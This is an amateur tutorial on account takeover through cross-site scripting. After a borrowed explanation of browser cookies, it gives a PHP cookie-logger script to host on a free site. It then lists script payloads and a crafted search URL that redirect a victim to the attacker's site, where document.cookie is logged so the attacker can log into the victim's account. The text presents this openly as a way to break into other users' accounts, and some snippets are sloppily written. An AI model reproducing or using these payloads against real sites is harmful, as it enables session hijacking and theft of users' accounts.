This method (XSS attacks) is for get the cookies users, so, for get information of users… and then, login into the account of the victim user…u will have to give one adress to the admin or the user u want to enter in his account…
What is cooke?
In computing, a cookie (also tracking cookie, browser cookie, and HTTP cookie) is a small piece of text stored on a user’s computer by a web browser. A cookie consists of one or more name-value pairs containing bits of information such as user preferences, shopping cart contents, the identifier for a server-based session, or other data used by websites.
It is sent as an HTTP header by a web server to a web browser and then sent back unchanged by the browser each time it accesses that server. A cookie can be used for authenticating, session tracking (state maintenance), and remembering specific information about users, such as site preferences or the contents of their electronic shopping carts. The term “cookie” is derived from “magic cookie”, a well-known concept in UNIX computing which inspired both the idea and the name of browser cookies. Some alternatives to cookies exist; each has its own uses, advantages, and drawbacks.
Being simple pieces of text, cookies are not executable. They are neither spyware or viruses, although cookies from certain sites are detected by many anti-spyware products because they can allow users to be tracked when they visit various sites.
Most modern browsers allow users to decide whether to accept cookies, and the time frame to keep them, but rejecting cookies makes some websites unusable. For example, shopping carts or login systems implemented using cookies do not work if cookies are disabled.
– Now, we already know what’s a cookie!
You can create a cookie logger :
Code:
<?php
$cookie = $_GET[‘cookie’];
$log = fopen(“cookie.txt”, “a”);
fwrite($log, $cookie .”\n”);
fclose($log);
?>
Host it on a freehost as a .php file. I recommend to use 0catch.com. You will also have to upload a separate “cookie.txt” file to your website.
Now that you’ve made a cookie logger, insert the following code into the vulnerable website to steal their cookies.
<script>alert(www.yourcookielogger.com/cookielogger.php)</script>
or
<script>document.location=’www.yourcookielogger.com/cookielogger.php?cookie=’+escape(document.cookie) </script>
EXPLOITING …..
To can get the cookies of the user that you want, you must give a adress to the ‘victim’, the victim will enter in the adress, and this adress will be redirect the victim to your host, to cookies.php for keep his cookies in cookie.txt
the adress u must give to the victim for get his cookies:
http://www.vulnerable_wepage_victim.com/search.php?word=<script>window.location=’http://www.your_website.com/cookies.php?cookie=’+document.cookie;</script>&Search=;
http://www.vulnerable_wepage_victim.com/
The victim website… that has a search, uses cookies and it’s vulnerable.
This attack bases in redirect a user to your page, in that you keep his cookie.
This method can be applied to other forms like a search for example a register of a forum…… etc.